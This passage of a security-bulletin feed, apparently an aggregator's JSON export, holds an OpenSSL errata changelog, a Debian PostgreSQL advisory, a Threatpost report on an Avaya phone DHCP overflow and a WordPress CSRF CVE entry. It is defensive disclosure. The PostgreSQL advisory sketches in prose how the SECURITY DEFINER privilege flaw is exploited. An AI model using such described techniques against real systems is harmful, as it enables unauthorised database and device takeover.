rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS", "modified": "2019-08-16T00:00:00", "published": "2019-08-16T00:00:00", "id": "ELSA-2019-4747", "href": "http://linux.oracle.com/errata/ELSA-2019-4747.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-08-09T14:23:34", "bulletinFamily": "unix", "description": "Package : postgresql-9.4\nVersion : 9.4.24-0+deb8u1\nCVE ID : CVE-2019-10208\n\n* CVE-2019-10208: `TYPE` in `pg_temp` executes arbitrary SQL during\n`SECURITY DEFINER` execution\n\nVersions Affected: 9.4 - 11\n\nGiven a suitable `SECURITY DEFINER` function, an attacker can execute\narbitrary SQL under the identity of the function owner. An attack\nrequires `EXECUTE` permission on the function, which must itself contain\na function call having inexact argument type match. For example,\n`length('foo'::varchar)` and `length('foo')` are inexact, while\n`length('foo'::text)` is exact. As part of exploiting this\nvulnerability, the attacker uses `CREATE DOMAIN` to create a type in a\n`pg_temp` schema. The attack pattern and fix are similar to that for\nCVE-2007-2138.\n\nWriting `SECURITY DEFINER` functions continues to require following the\nconsiderations noted in the documentation:\n\nhttps://www.postgresql.org/docs/devel/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY\n\nThe PostgreSQL project thanks Tom Lane for reporting this problem.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n9.4.24-0+deb8u1.\n\nWe recommend that you upgrade your postgresql-9.4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2019-08-09T08:34:12", "published": "2019-08-09T08:34:12", "id": "DEBIAN:DLA-1874-1:A0C54", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201908/msg00007.html", "title": "[SECURITY] [DLA-1874-1] postgresql-9.4 security update", "type": "debian", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-10-07T19:28:42", "bulletinFamily": "info", "description": "A decade-old remote code-execution (RCE) bug has been found, unpatched, in an Avaya desk phone that\u2019s used at 90 percent of Fortune 100 companies. If exploited, attackers could remotely take over the operation of the phone, exfiltrate audio and potentially even \u201cbug\u201d the phone to listen in continuously.\n\nResearchers found the Avaya 9600 series IP Deskphone vulnerability in a piece of open source software that Avaya likely copied and modified 10 years ago. The same bug was reported in 2009, according to the analysis from McAfee shared with Threatpost at Black Hat 2019, \u201cyet its presence in the phone\u2019s firmware remained unnoticed until now.\u201d\n\n## Finding the Bug\n\nIn analyzing the publicly available firmware for the Avaya VoIP phone, researchers were able to gain access to a root shell and the ability to reverse-engineer the files on the phone. The phone runs Linux, and McAfee analysts were able to find a list of processes running with a network connection.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhile poking around, it becomes clear that one of the utilities, dhclient, is of great interest,\u201d explained Philippe Laulhert, analyst at McAfee, in research released at Black Hat 2019 on Thursday. \u201cIt is already running on the system and handles network configuration (the so-called DHCP requests to configure the phone\u2019s IP address). If we invoke it in the command line, [it shows] a detailed help screen describing its expected arguments [with a] 2004-2007 copyright.\u201d\n\nThe age of the code is \u201ca big red flag,\u201d he said. He was able to find that the 4.0.0 version that the phone runs is more than 10 years old and, even worse, an exploit targeting it is publicly available. From there, he confirmed the phone\u2019s version of dhclient is also vulnerable to the bug reported in 2009, and that, with some tweaking, the public exploit also works.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/08/08101727/avaya-phone.jpg>)\n\n\u201cBuilding a weaponized version able to threaten private networks is more of a software engineering task and a skilled attacker might only need a few weeks, if not days, to put one together,\u201d Laulhert said.\n\nAn attack can be carried out remotely as long as the attacker has connected to the same network as a vulnerable phone, according to McAfee.\n\n## Bug Details\n\nThe bug (CVE-2009-0692) is critical a stack-based buffer overflow flaw that exists in the ISC Dynamic Host Configuration Protocol (DHCP) client, according to [Avaya\u2019s advisory](<https://downloads.avaya.com/css/P8/documents/101059945>). DHCP is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask and a broadcast address.\n\nIf the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root), according to the bulletin. The flaw carries a CVSS severity score of 10 out of 10.\n\nA follow-on issue with a severity rating of 7.5 also exists (CVE-2011-0997): \u201cThe DHCP client daemon, dhclient, did not sufficiently sanitize certain options provided in DHCP server replies, such as the client hostname,\u201d according to the advisory. \u201cA malicious DHCP server could send such an option with a specially crafted value to a DHCP client. If this option\u2019s value was saved on the client system, and then later insecurely evaluated by a process that assumes the option is trusted, it could lead to arbitrary code execution with the privileges of that process.\u201d\n\n## Mitigation\n\nAvaya published a [firmware image](<https://support.avaya.com/downloads/download-details.action?contentId=C2019624937516100_7&productId=P0553>) that resolves the issue on June 25 \u2013 admins are urged to update their gear, but the researcher noted that it may take a while for protections to roll out across the entire attack surface.\n\n\u201cThe fix [has] been out for more than 30 days, leaving IT administrators ample time to deploy the new image,\u201d Laulhert said. \u201cIn a large enterprise setting, it is pretty common to first have a testing phase where a new image is being deployed to selected devices to ensure no conflict arises from the deployment. This explains why the timeline from the patch release to deployment to the whole fleet may take longer than what is typical in consumer grade software.\u201d\n\nWhile Avaya was prompt to fix the problem, the discovery of the unpatched bug points out the fact that embedded devices offer a vast landscape for older flaws to slip through.\n\n\u201cIt is important to realize this is not an isolated case and many devices across multiple industries still run legacy code more than a decade old,\u201d Laulhert said. \u201cFrom a system administration perspective, it is important to consider all these networked devices as tiny black-box computers running unmanaged code which should be isolated and monitored accordingly.\u201d\n\nOnly the H.323 software stack is affected (as opposed to the SIP stack that can also be used with these phones), according to the analysis.\n\n**_Black Hat USA 2019 has kicked off this week in Las Vegas. For more Threatpost breaking news, stories and videos from Black Hat and DEF CON, _**[**_click here_**](<https://threatpost.com/category/bh/>)**_._**\n", "modified": "2019-08-08T20:00:50", "published": "2019-08-08T20:00:50", "id": "THREATPOST:1C22C4E02A8A1BDD89C6A3CCC2352014", "href": "https://threatpost.com/critical-rce-bug-avaya-voip-phones/147122/", "type": "threatpost", "title": "Critical RCE Bug Found Lurking in Avaya VoIP Phones", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-08-01T10:47:31", "bulletinFamily": "NVD", "description": "A CSRF vulnerability in Settings form in the Custom Simple Rss plugin 2.0.6 for WordPress allows attackers to change the plugin settings.", "modified": "2019-07-31T18:45:00", "id": "CVE-2019-14327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14327", "published": "2019-07-30T13:15:00", "title": "CVE-2019-14327", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
